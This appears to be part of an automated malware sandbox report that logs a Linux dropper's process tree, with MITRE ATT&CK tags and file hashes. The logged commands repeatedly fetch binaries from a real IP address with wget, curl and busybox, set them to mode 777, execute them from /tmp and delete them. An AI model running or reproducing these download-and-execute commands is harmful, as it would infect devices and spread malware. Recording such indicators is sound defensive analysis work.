/bin/rmrm sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:1629
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:1630
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Writes file to tmp directory
PID:1631
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:1632
-
-
/bin/chmodchmod 777 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- File and Directory Permissions Modification
PID:1633
-
-
/tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT./2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Executes dropped EXE
PID:1634
-
-
/bin/rmrm 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:1635
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:1636
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Writes file to tmp directory
PID:1637
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:1638
-
-
/bin/chmodchmod 777 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- File and Directory Permissions Modification
PID:1639
-
-
/tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW./UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Executes dropped EXE
PID:1640
-
-
/bin/rmrm UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:1641
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:1642
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Writes file to tmp directory
PID:1643
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:1644
-
-
/bin/chmodchmod 777 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- File and Directory Permissions Modification
PID:1645
-
-
/tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc./SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Executes dropped EXE
PID:1646
-
-
/bin/rmrm SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:1647
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:1648
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Writes file to tmp directory
PID:1649
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:1650
-
-
/bin/chmodchmod 777 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- File and Directory Permissions Modification
PID:1651
-
-
/tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt./LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Executes dropped EXE
PID:1652
-
-
/bin/rmrm LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:1653
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:1654
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Writes file to tmp directory
PID:1655
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:1656
-
-
/bin/chmodchmod 777 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517./LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:1659
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97